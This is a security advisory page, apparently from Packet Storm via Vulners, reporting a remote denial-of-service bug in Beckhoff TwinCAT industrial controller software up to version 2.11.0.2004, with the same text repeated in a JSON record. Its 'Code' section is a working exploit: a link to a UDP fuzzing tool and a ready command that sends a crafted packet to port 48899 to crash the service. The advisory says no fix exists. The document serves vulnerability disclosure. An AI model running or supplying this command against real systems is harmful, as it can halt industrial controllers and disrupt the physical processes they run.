Search...

Beckhoff TwinCAT 2.11.0.2004 Denial Of Service

2011-09-14T00:00:00

ID PACKETSTORM:105088
Type packetstorm
Reporter Luigi Auriemma
Modified 2011-09-14T00:00:00

Description

                                        
                                            `#######################################################################  
  
Luigi Auriemma  
  
Application: Beckhoff TwinCAT  
http://www.beckhoff.de/twincat/  
Versions: &lt;= 2.11.0.2004  
Platforms: Windows  
Bug: Denial of Service  
Exploitation: remote  
Date: 13 Sep 2011  
Author: Luigi Auriemma  
e-mail: aluigi@autistici.org  
web: aluigi.org  
  
  
#######################################################################  
  
  
1) Introduction  
2) Bug  
3) The Code  
4) Fix  
  
  
#######################################################################  
  
===============  
1) Introduction  
===============  
  
  
From vendor's website:  
"The Beckhoff TwinCAT software system turns almost any compatible PC  
into a real-time controller with a multi-PLC system, NC axis control,  
programming environment and operating station."  
  
  
#######################################################################  
  
======  
2) Bug  
======  
  
  
Denial of Service caused by an invalid read access.  
  
  
#######################################################################  
  
===========  
3) The Code  
===========  
  
  
http://aluigi.org/testz/udpsz.zip  
  
udpsz -C "03 66 14 71 00 00 00 00 06 00 00 00 0a ff ff 02 01 01 10 27" -b 0xff SERVER 48899 0x5fe  
  
  
#######################################################################  
  
======  
4) Fix  
======  
  
  
No fix.  
  
  
#######################################################################  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:105088", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Beckhoff TwinCAT 2.11.0.2004 Denial Of Service", "description": "", "published": "2011-09-14T00:00:00", "modified": "2011-09-14T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/105088/Beckhoff-TwinCAT-2.11.0.2004-Denial-Of-Service.html", "reporter": "Luigi Auriemma", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:22:57", "viewCount": 1, "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2016-11-03T10:22:57", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:22:57", "rev": 2}, "vulnersScore": -0.1}, "sourceHref": "https://packetstormsecurity.com/files/download/105088/twincat_1-adv.txt", "sourceData": "`####################################################################### \n \nLuigi Auriemma \n \nApplication: Beckhoff TwinCAT \nhttp://www.beckhoff.de/twincat/ \nVersions: <= 2.11.0.2004 \nPlatforms: Windows \nBug: Denial of Service \nExploitation: remote \nDate: 13 Sep 2011 \nAuthor: Luigi Auriemma \ne-mail: aluigi@autistici.org \nweb: aluigi.org \n \n \n####################################################################### \n \n \n1) Introduction \n2) Bug \n3) The Code \n4) Fix \n \n \n####################################################################### \n \n=============== \n1) Introduction \n=============== \n \n \nFrom vendor's website: \n\"The Beckhoff TwinCAT software system turns almost any compatible PC \ninto a real-time controller with a multi-PLC system, NC axis control, \nprogramming environment and operating station.\" \n \n \n####################################################################### \n \n====== \n2) Bug \n====== \n \n \nDenial of Service caused by an invalid read access. \n \n \n####################################################################### \n \n=========== \n3) The Code \n=========== \n \n \nhttp://aluigi.org/testz/udpsz.zip \n \nudpsz -C \"03 66 14 71 00 00 00 00 06 00 00 00 0a ff ff 02 01 01 10 27\" -b 0xff SERVER 48899 0x5fe \n \n \n####################################################################### \n \n====== \n4) Fix \n====== \n \n \nNo fix. \n \n \n####################################################################### \n`\n", "immutableFields": [], "cvss2": {}, "cvss3": {}}